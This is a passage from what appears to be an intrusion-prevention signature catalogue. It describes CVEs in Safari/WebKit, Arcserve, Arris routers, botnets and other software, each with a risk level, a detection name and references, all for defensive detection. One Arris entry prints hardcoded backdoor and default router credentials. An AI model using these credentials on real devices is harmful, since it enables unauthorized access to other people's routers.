File-Text_Apple-Safari-Webkit-Floating-Point-Buffer-Overflow
References:
CVE-2009-2195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2195
BID-36023
http://www.securityfocus.com/bid/36023
Back to top

Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution

About this vulnerability: A vulnerability in Apple Safari
Risk: High
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: A code execution vulnerability has been reported in Apple Safari web browser. The vulnerability is due to a design error when processing floating point data types. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted web page. In attack scenarios where code execution is successful the behavior of the target machine would depend entirely on the intention of the injected code, which would run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution
File-Text_Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution
References:
CVE-2010-1807
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
BID-43047
http://www.securityfocus.com/bid/43047
Back to top

Apple-Safari-Webkit-Innerhtml-Double-Free-Memory-Corruption

About this vulnerability: A vulnerability in Apple Computer Safari
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: A code execution vulnerability exists in Apple Safari. The vulnerability is due to a use-after-free error when clearing a body or iframe element dynamically using script code. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted web page. In attack scenarios where code execution is successful the behaviour of the target machine would depend entirely on the intention of the injected code, which would run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally.
Situation: File-Text_Apple-Safari-Webkit-Innerhtml-Double-Free-Memory-Corruption
References:
CVE-2011-0221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0221
BID-48844
http://www.securityfocus.com/bid/48844
OSVDB-73998
http://www.osvdb.org/73998
Back to top

Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption

About this vulnerability: A vulnerability in Apple Safari
Risk: High
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: There is a code execution vulnerability in Apple Safari. The vulnerability is due to memory corruption when processing the onchange event for menus. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted web page. In attack scenarios where code execution is successful the behavior of the target machine depends on the intention of the injected code, which runs in the security context of the logged on user.
Situation: HTTP_SS-Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption
File-Text_Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption
References:
CVE-2010-1814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1814
BID-43083
http://www.securityfocus.com/bid/43083
Back to top

Apple-Safari-Webkit-Option-Element-Contenteditable-Code-Execution

About this vulnerability: A vulnerability in Apple Safari
Risk: Moderate
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: A vulnerability has been reported in Apple Safari's WebKit that could allow remote attackers to execute arbitrary code on a vulnerable system. The vulnerability is due to the way the vulnerable application removes a particular container element containing another element with a specific attribute. Remote attackers could exploit this vulnerability by enticing the target user to open a maliciously crafted web page. Successful exploitation could result in execution of arbitrary code within the security context of the current user. An unsuccessful attempt will terminate the affected application abnormally.
Situation: File-Text_Apple-Safari-Webkit-Option-Element-Contenteditable-Code-Execution
References:
CVE-2010-1396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1396
BID-40647
http://www.securityfocus.com/bid/40647
BID-40620
http://www.securityfocus.com/bid/40620
Back to top

Apple-Safari-Webkit-Range-Object-Remote-Code-Execution

About this vulnerability: A vulnerability in Apple Computer Safari
Risk: High
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: A memory corruption vulnerability exists in Apple Safari WebKit. The vulnerability is due to an error while parsing a range object within the Document Object Model. The vulnerable code does not account for DOM manipulation by event listeners. A remote, unauthenticated attacker can exploit this vulnerability by enticing an unsuspecting user to access a maliciously crafted web page. This can lead to code execution in the context of the current user. Where code execution is not successful, the application may terminate abnormally.
Situation: HTTP_SS-Apple-Safari-Webkit-Range-Object-Remote-Code-Execution
File-Text_Apple-Safari-Webkit-Range-Object-Remote-Code-Execution
References:
CVE-2011-0115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0115
BID-46746
http://www.securityfocus.com/bid/46746
Back to top

Apple-Safari-Webkit-Rendering-Counter-Code-Execution

About this vulnerability: A vulnerability in Apple Safari
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: A vulnerability has been reported in Apple Safari's WebKit that could allow remote attackers to execute arbitrary code on a vulnerable system. The vulnerability is due to an error in WebKit's support for generated content. When utilizing generated content on an element, the vulnerable code inserts multiple references to the generated element. When the generated page is being destroyed the vulnerable application will navigate through the references to discover more elements to destroy. Remote attackers could exploit this vulnerability by enticing the target user to open a maliciously crafted web page. Successful exploitation could result in execution of arbitrary code within the security context of the current user. An unsuccessful attempt will terminate the affected application abnormally.
Situation: File-Text_Apple-Safari-Webkit-Rendering-Counter-Code-Execution
References:
CVE-2010-1784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1784
BID-42020
http://www.securityfocus.com/bid/42020
Back to top

Apple-Safari-Webkit-Selections-Use-After-Free

About this vulnerability: A vulnerability in Apple Computer Safari
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X; Windows
Software: Safari
Type: Malfunction
Description: There is a code execution vulnerability in Apple Safari. The vulnerability is due to a use-after-free error when processing selections. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted web page. In attack scenarios where code execution is successful the behavior of the target machine would depend entirely on the intention of the injected code, which would run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Apple-Safari-Webkit-Selections-Use-After-Free
File-Text_Apple-Safari-Webkit-Selections-Use-After-Free
References:
CVE-2010-1812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1812
BID-43079
http://www.securityfocus.com/bid/43079
Back to top

Apple-Safari-Webkit-SVG-Markers-Use-After-Free-Memory-Corruption

About this vulnerability: A vulnerability in Apple Computer Safari
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: A heap corruption vulnerability has been found in WebKit. The vulnerability is located in the code that handles Scalable Vector Graphics (SVG) objects. The vulnerable code doesn't properly handle reference counting when updating SVG markers, causing a use-after-free condition. A remote attacker could entice a target user to view a maliciously crafted web page that exploits this vulnerability to run arbitrary code in the target user's security context.
Situation: File-TextId_Apple-Safari-Webkit-SVG-Markers-Use-After-Free-Memory-Corruption
References:
CVE-2011-1453
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1453
OSVDB-74013
http://www.osvdb.org/74013
Back to top

Apple-Safari-Webkit-SVG-Memory-Corruption

About this vulnerability: A vulnerability in Apple Computer Safari
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: A heap memory corruption vulnerability has been found in the WebKit component of Apple Safari. The vulnerability is located in the code that handles Scalable Vector Graphics (SVG) objects and causes access to corrupted memory. A remote attacker could entice a target user to view a maliciously crafted web page that exploits this vulnerability to run arbitrary code in the target user's security context.
Situation: File-Text_Apple-Safari-Webkit-SVG-Memory-Corruption
References:
CVE-2011-0222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0222
BID-48844
http://www.securityfocus.com/bid/48844
OSVDB-73999
http://www.osvdb.org/73999
Back to top

Apple-Safari-Webkit-Use-After-Free-Code-Execution

About this vulnerability: A vulnerability in Apple Safari
Risk: Low
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: There exists a code execution vulnerability in Apple Safari. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Apple-Safari-Webkit-Use-After-Free-Code-Execution
References:
CVE-2010-1806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1806
BID-43049
http://www.securityfocus.com/bid/43049
Back to top

Apple-Safari-Webkit-Webarchive-Injection

About this vulnerability: An Apple Safari Webkit Webarchive Injection vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Javascript Injection
Description: A vulnerability in Apple Safari, versions before 6.2.6, 7.x before 7.1.6, and 8.x before 8.0.6, which allows remote attackers to use a file:// URL and up load a malicious .webarchive file when then allows the remote attacker to read arbitrary files, inject cross-domain Javascript, or silently install Safari extensions.
Situation: File-Text_Apple-Safari-Webkit-Webarchive-Injection
References:
CVE-2015-1155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1155
Back to top

Apple-Safari-Webkit-XSS-Vulnerability-CVE-2017-7089

About this vulnerability: A vulnerability in WebKit
Risk: Moderate
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1770-5242
Platform: Generic
Software: Webkit
Type: Cross-site Scripting
Description: A logic issue in WebKit's handling of the parent-tab component causes an universal cross-site scripting vulnerability in older Safari browser versions.
Situation: File-Text_Apple-Safari-Webkit-XSS-Vulnerability-CVE-2017-7089
References:
CVE-2017-7089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7089
Back to top

Apple-Safari-XML-Parser-Infinite-Recursion-DoS

About this vulnerability: Apple Safari XML Parser Infinite Recursion DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Safari
Type: Browser
Description: A vulnerability exists in Apple Safari 4.0.4 allowing remote attackers to cause a denial of service condition via an XML document composed of a long series of start-tags followed by backslashes.
Situation: File-TextId_Apple-Safari-XML-Parser-Infinite-Recursion-DoS
Back to top

Apple-Software-Update-Remote-Command-Execution

About this vulnerability: A remote command execution vulnerability in Apple Software Update
Risk: High
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: <os>
Type: Input Validation
Description: There is a remote command execution vulnerability in the Software Update component of Apple Mac OS X. The vulnerability allows arbitrary code execution in the context of the Software Update.
Situation: HTTP_SS-Apple-Software-Update-Remote-Command-Execution
File-TextId_Apple-Software-Update-Remote-Command-Execution
References:
CVE-2007-5863
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5863
BID-26908
http://www.securityfocus.com/bid/26908
Back to top

Apple-Webkit-Code-Execution-Vulnerability-CVE-2011-2813

About this vulnerability: A vulnerability in Apple WebKit
Risk: High
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Webkit
Type: Malfunction
Description: There exists a vulnerability in Apple WebKit that can allow a man-in-the-middle attacker to execute arbitrary code or cause a denial of service condition.
Situation: File-Text_Apple-Webkit-Code-Execution-Vulnerability-CVE-2011-2813
References:
CVE-2011-2813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2813
BID-50066
http://www.securityfocus.com/bid/50066
Back to top

Apple-Webkit-Cross-Site-Scripting-CVE-2021-1879

About this vulnerability: A vulnerability in Apple WebKit
Risk: High
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Platform: iOS
Software: Webkit
Type: Cross-site Scripting
Description: There exists a vulnerability in Apple WebKit that can allow universal cross site scripting.
Situation: File-Text_Apple-Webkit-Cross-Site-Scripting-CVE-2021-1879
References:
CVE-2021-1879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1879
Back to top

Apple-Webkit-Memory-Corruption-CVE-2016-4657

About this vulnerability: A vulnerability in Apple Webkit
Risk: High
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Platform: iOS
Software: Webkit
Type: Malfunction
Description: A memory corruption vulnerability that allows arbitrary code execution or causing a denial of service condition has been reported in Webkit. Apple iOS versions before 9.3.5 are affected. A remote attacker can exploit this vulnerability by enticing a user into visiting a maliciously crafted web page.
Situation: File-Text_Apple-Webkit-Memory-Corruption-CVE-2016-4657
References:
CVE-2016-4657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4657
Back to top

Apple-Webkit-Rowspan-DoS

About this vulnerability: Apple Webkit rowspan Denial of Service
Risk: Moderate
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Webkit
Type: Misconfiguration
Description: Large rowspan attribute within the html <td> tag might cause a denial of service in some Webkit builds.
Situation: File-Text_Apple-Webkit-Rowspan-DoS
References:
CVE-2007-0342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0342
BID-22059
http://www.securityfocus.com/bid/22059
Back to top

Apple-Webkit-Ruby-Annotation-Memory-Corruption

About this vulnerability: A vulnerability in Google Chrome
Risk: Moderate
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple iTunes;Safari;Chrome
Type: Malfunction
Description: There is a memory corruption vulnerability within Apple WebKit, a component of Apple Safari and Google Chrome web browsers, as well as Apple iTunes. This vulnerability is due to incorrect handling of display: and counter-reset: properties within ruby:before and ruby:after style sheet blocks. Remote attackers may exploit these vulnerabilities by enticing target users to visit a specially crafted web page. Successful exploitation would allow injection and execution of arbitrary code within the context of the currently logged on user.
Situation: File-Text_Apple-Webkit-Ruby-Annotation-Memory-Corruption
References:
CVE-2011-1440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1440
OSVDB-72205
http://www.osvdb.org/72205
Back to top

Apple-XAR-Archive-Parsing-Arbitrary-File-Write-Vulnerability

About this vulnerability: A vulnerability in Apple Computer XAR
Risk: Moderate
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Platform: Mac OS
Software: <os>
Type: Malfunction
Description: There exists a file write vulnerability in the Apple XAR command. Successful exploitation could result in arbitrary file overwrite.
Situation: File-Binary_Apple-XAR-Archive-Parsing-Arbitrary-File-Write-Vulnerability
References:
CVE-2021-30833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30833
Back to top

Apple-XAR-Archive-Symlink-Parsing-Arbitrary-File-Write-Vulnerability

About this vulnerability: A vulnerability in Apple Computer XAR
Risk: Moderate
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1462-5242
Platform: Mac OS X
Software: <os>
Type: Malfunction
Description: Improper validation of file names inside XAR files causes an arbitrary file write vulnerability in MacOS. A successful exploit allows an attacker to write arbitrary files on the target system.
Situation: File-Binary_Apple-XAR-Archive-Symlink-Parsing-Arbitrary-File-Write-Vulnerability
References:
CVE-2022-22582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22582
Back to top

Apport-Remote-Code-Execution-Via-CrashDB-Field-CVE-2016-9949

About this vulnerability: An attempt to exploit a vulnerability in Apport detected
Risk: High
First detected in: sgpkg-ips-1791-5242
Last changed: sgpkg-ips-1791-5242
Platform: Linux
Software: Apport
Type: Input Validation
Description: An issue was discovered in Apport before 2.20.4. In apport/ui.py, Apport reads the CrashDB field and it then evaluates the field as Python code if it begins with a "{". This allows remote attackers to execute arbitrary Python code.
Situation: File-Text_Apport-Remote-Code-Execution-Via-CrashDB-Field-CVE-2016-9949
References:
CVE-2016-9949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9949
Back to top

AppRain-CMF-Arbitrary-PHP-File-Upload

About this vulnerability: A AppRain CMF Arbitrary PHP File Upload vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AppRain
Type: Input Validation
Description: An input validation vulnerability in AppRain CMF, versions 0.1.5 and before, which allows remote attackers to upload arbitrary PHP files which can result in code execution.
Situation: HTTP_CS-AppRain-CMF-Arbitrary-PHP-File-Upload
References:
CVE-2012-1153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1153
BID-51576
http://www.securityfocus.com/bid/51576
OSVDB-78473
http://www.osvdb.org/78473
Back to top

Appsmith-RCE-CVE-2024-55964

About this vulnerability: A vulnerability in Appsmith
Risk: Moderate
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Linux
Software: Appsmith
Type: Insecure Configuration
Description: An insecure configuration in the PostgreSQL instance in Appsmith which allows remote attackers to execute arbitrary code on the target system.
Situation: HTTP_CRL-Appsmith-RCE-CVE-2024-55964
References:
CVE-2024-55964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55964
Back to top

APSystems-ECU-R-Command-Injection-CVE-2022-45699

About this vulnerability: A vulnerability in APSystems ECU-R
Risk: High
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: APSystems ECU-R
Type: Input Validation
Description: A command injection vulnerability has been reported in the administration interface of the APSystems ECU-R devices. An unauthenticated attacker could use this vulnerability to execute arbitrary commands as root.
Situation: HTTP_CS-APSystems-ECU-R-Command-Injection-CVE-2022-45699
References:
CVE-2022-45699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45699
Back to top

Arcadyan-Firmware-Path-Traversal-CVE-2021-20090

About this vulnerability: A vulnerability in Arcadyan firmware
Risk: High
First detected in: sgpkg-ips-1386-5242
Last changed: sgpkg-ips-1386-5242
Platform: Generic
Software: Arcadyan
Type: Directory Traversal
Description: A path traversal vulnerability has been reported in multiple routers and modems which use Arcadyan firmware. Successful exploitation of this vulnerability can lead to authentication bypass.
Situation: HTTP_CSU-Arcadyan-Firmware-Path-Traversal-CVE-2021-20090
References:
CVE-2021-20090
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090
Back to top

Arcserve-Backup-Lgserver-Authentication-Password-Buffer-Overflow

About this vulnerability: A vulnerability in CA BrightStor ARCserve Backup for Laptops and Desktops
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite; Computer Associates Protection Suite Server; Computer Associates BrightStor Mobile Backup; Computer Associates Unicenter DMS Manager
Type: Buffer Overflow
Description: There exist two buffer overflow vulnerabilities in the way CA BrightStor ARCServe Backup for Laptops and Desktops service handles incoming messages. Specifically the vulnerabilities are due to lack of boundary check when processing user authentication requests. By sending specially crafted authentication request, an unauthenticated remote attacker can leverage these flaws to execute arbitrary code on the target host with System privileges.
Situation: ARCserve_CS-Arcserve-Backup-Lgserver-Authentication-Password-Buffer-Overflow
References:
CVE-2007-5004
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5004
BID-24348
http://www.securityfocus.com/bid/24348
Back to top

ARCserve-D2D-Getnews-External-Entity-Injection

About this vulnerability: A vulnerability in CA ARCserve D2D
Risk: Moderate
First detected in: sgpkg-ips-1308-5242
Last changed: sgpkg-ips-1308-5242
Platform: Generic
Software: CA ARCserve D2D
Type: Input Validation
Description: Improper validation of request payload data causes an XML external entity injection vulnerability in CA ARCserve D2D. A successful attack may allow an attacker to gain access to information on the system.
Situation: HTTP_CRL-ARCserve-D2D-Getnews-External-Entity-Injection
References:
CVE-2020-27858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27858
Back to top

Arcserve-UDP-Authentication-Bypass-CVE-2023-26258

About this vulnerability: An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected
Risk: High
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Platform: Generic
Software: Arcserve Unified Data Protection
Type: Insecure Configuration
Description: Authentication bypass vulnerability in Arcserve Unified Data Protection (UDP).
Situation: File-TextId_Arcserve-UDP-Authentication-Bypass-CVE-2023-26258
References:
CVE-2023-26258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26258
Back to top

Arcserve-UDP-FileHandlingServlet-doUpload-Directory-Traversal

About this vulnerability: An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected.
Risk: High
First detected in: sgpkg-ips-1695-5242
Last changed: sgpkg-ips-1695-5242
Platform: Windows
Software: Arcserve Unified Data Protection
Type: Input Validation
Description: A vulnerability in Arcserve Unified Data Protection, versions prior to 9.2, which allows remote attackers to upload arbitrary files and execute code in the context as SYSTEM, due to improper validation of upload files in FileHandlingServlet.
Situation: HTTP_CS-Arcserve-UDP-FileHandlingServlet-doUpload-Directory-Traversal
References:
CVE-2023-42000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42000
Back to top

Arcserve-Unified-Data-Protection-Asnative.dll-Validate-Denial-Of-Service

About this vulnerability: A vulnerability in Arcserve Unified Data Protection
Risk: High
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Platform: Generic
Software: Arcserve Unified Data Protection
Type: Input Validation
Description: A denial-of-service vulnerability exists in Arcserve Unified Data Protection (UDP). The vulnerability is due to improper validation of username in ASNative.dll. A remote unauthenticated attacker can exploit the vulnerability by sending crafted request to the target application. Successful exploitation could result in denial-of-service conditions in the target application.
Situation: File-TextId_Arcserve-Unified-Data-Protection-Asnative.dll-Validate-Denial-Of-Service
References:
CVE-2024-0801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0801
Back to top

Arcserve-Unified-Data-Protection-Directory-Traversal

About this vulnerability: A vulnerability in Arcserve Unified Data Protection
Risk: High
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Arcserve Unified Data Protection
Type: Directory Traversal
Description: Several directory traversal vulnerabilities exist in Arcserve Unified Data Protection (UDP). These vulnerabilities exist in reportFileServlet and exportServlet and are due to insufficient input validation of the file path. A remote unauthenticated attacker can exploit this vulnerability to result in information disclosure and denial of service.
Situation: HTTP_CRL-Arcserve-Unified-Data-Protection-Directory-Traversal
References:
CVE-2015-4068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4068
Back to top

Arcserve-Unified-Data-Protection-Getbackuppolicies-Information-Disclosure

About this vulnerability: A vulnerability in Arcserve Unified Data Protection
Risk: High
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Arcserve Unified Data Protection
Type: Input Validation
Description: An information disclosure vulnerability exists in Arcserve Unified Data Protection (UDP). This vulnerability exists in EdgeServiceImpl and is due to insufficient input validation of certain SOAP requests using the getBackupPolicies method. A remote unauthenticated attacker can exploit this vulnerability to cause information disclosure.
Situation: HTTP_CS-Arcserve-Unified-Data-Protection-Getbackuppolicies-Information-Disclosure
References:
CVE-2015-4069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4069
Back to top

Arcserve-Unified-Data-Protection-ImportNodeServlet-Dopost-Directory-Traversal

About this vulnerability: An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected
Risk: High
First detected in: sgpkg-ips-1710-5242
Last changed: sgpkg-ips-1710-5242
Platform: Windows
Software: Arcserve Unified Data Protection
Type: Input Validation
Description: A vulnerability in Arcserve Unified Data Protection, verions 8.1 and earlier, and 9.2 and earlier, which allows remote attackers to upload and execute arbitrary code by sending crafted requests to the target system, due to improper validation of upload files in ImportNodeServlet.
Situation: HTTP_CSH-Arcserve-Unified-Data-Protection-ImportNodeServlet-Dopost-Directory-Traversal
References:
CVE-2024-0800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0800
Back to top

Arcserve-Unified-Data-Protection-Management-Service-Information-Disclosure

About this vulnerability: A vulnerability in Arcserve Unified Data Protection
Risk: High
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Arcserve Unified Data Protection
Type: Input Validation
Description: An information disclosure vulnerability exists in Arcserve Unified Data Protection (UDP). This vulnerability exists in EdgeServiceImpl and is due to insufficient input validation of certain SOAP requests using the getBackupPolicy method. A remote unauthenticated attacker can exploit this vulnerability to result in information disclosure.
Situation: File-TextId_Arcserve-Unified-Data-Protection-Management-Service-Information-Disclosure
References:
CVE-2015-4069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4069
Back to top

Arcserve-Unified-Data-Protection-Rpsservice4cpmimpl-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Arcserve Unified Data Protection
Risk: Moderate
First detected in: sgpkg-ips-1690-5242
Last changed: sgpkg-ips-1690-5242
Platform: Generic
Software: Arcserve Unified Data Protection
Type: Malfunction
Description: The exposure of an unauthenticated file upload function and the insufficient validation of the data given thereto cause an unrestricted file upload vulnerability in Arcserve Unified Data Protection.
Situation: File-TextId_Arcserve-Unified-Data-Protection-Rpsservice4cpmimpl-Unrestricted-File-Upload
References:
CVE-2023-41998
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41998
Back to top

Ares-Peer-To-Peer-Network-Usage

About this vulnerability: Ares peer-to-peer network usage
Risk: Moderate
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1712-5242
Platform: Generic
Software: Ares
Type: Peer-to-Peer
Description: Ares is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors. Popular clients include Ares p2p, Warez p2p and FileCroc.
Back to top

Argosoft-FTP-Server-Dele-Command-BOF

About this vulnerability: Buffer overflow in ArGoSoft FTP server
Risk: Moderate
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ArGoSoft FTP Server
Type: Buffer Overflow
Description: ArGoSoft FTP server contains a buffer overflow vulnerability in the DELE command handling. A remote attacker could send a overly long DELE command to overflow a buffer, thus causing a denial of service and possibly execute arbitrary code on the server.
Situation: FTP_CS-Long-Dele-Command-Detection
References:
CVE-2005-0696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0696
BID-12755
http://www.securityfocus.com/bid/12755
OSVDB-14611
http://www.osvdb.org/14611
Back to top

ARJ-Archive-Long-Local-File-Header-7-Zip-BOF

About this vulnerability: 7-Zip archiver is vulnerable to a BOF when parsing long ARJ headers
Risk: High
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: 7-Zip
Type: Buffer Overflow
Description: 7-Zip archiver does not handle correctly ARJ archives that contain larger file headers than the ARJ specification allows. The format specifies 2600 bytes as the maximum size of a header, and 7-zip allocates 2672 bytes for each header. When parsing an ARJ file, the amount of data specified in the headers size field is copied to a fixed size buffer, resulting in a buffer overflow with malformed archives. The vulnerability allows remote attackers to execute arbitrary code on a victim machine, if they can persuade the victim into opening an malformed ARJ file with 7-zip.
Situation: HTTP_7-Zip-ARJ-Archive-Long-Local-File-Header-Buffer-Overflow
File-Binary_ARJ-Archive-Long-Local-File-Header-7-Zip-BOF
References:
CVE-2005-3051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3051
BID-14925
http://www.securityfocus.com/bid/14925
Back to top

Armageddon-Bot

About this vulnerability: Armageddon Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Armageddon is a Botnet used for Distributed Denial of Service (DDoS) attacks.
Situation: HTTP_CS-Armageddon-Bot-Traffic
Back to top

ARMBot-Botnet

About this vulnerability: ARMBot Botnet traffic has been detected
Risk: High
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Platform: Windows; Linux
Software: <os>
Type: Backdoor
Description: ARMBot Botnet traffic has been detected.
Situation: HTTP_CRL-ARMBot-Botnet
Back to top

Arris-Motorola-Surfboard-SBG6580-Multiple-Vulnerabilites

About this vulnerability: Arris Motorola Surfboard SBG6580 Multiple Vulnerabilites.
Risk: High
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Arris Motorola Surfboard
Type: Insecure Configuration
Description: Multiple vulnerabilites exist in Arris Motorola Surfboard SBG6580 which grant remote attackers control over the router. A hard coded backdoor account with credentials "technician/yZgO8Bvj" along with the default "admin/motorola" default credentials can be used to sign in the user into the router, where a persistant XSS vulnerability is exploited in the firewall configuration page. This allows the injection of Javascript that can perform any available action in the router interface. The respective fingerprint covers , CVE-2015-0964, CVE-2015-0965, and CVE-2015-0966.
Situation: File-Text_Arris-Motorola-Surfboard-SBG6580-Multiple-Vulnerabilites
References:
CVE-2015-0964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0964
Back to top

Arris-TR3300-Command-Injection-CVE-2022-27002

About this vulnerability: A vulnerability in Arris TR3300
Risk: High
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: Arris TR3300
Type: Input Validation
Description: A command injection vulnerability has been reported in Arris TR3300 wireless routers. An unauthenticated attacker could use this vulnerability to execute arbitrary commands.
Situation: HTTP_CRL-Arris-TR3300-Command-Injection-CVE-2022-27002
References:
CVE-2022-27002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27002
Back to top

Arris-VAP2500-Management-Portal-Command-Execution

About this vulnerability: An Arris VAP2500 Management Portal Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-695-5211
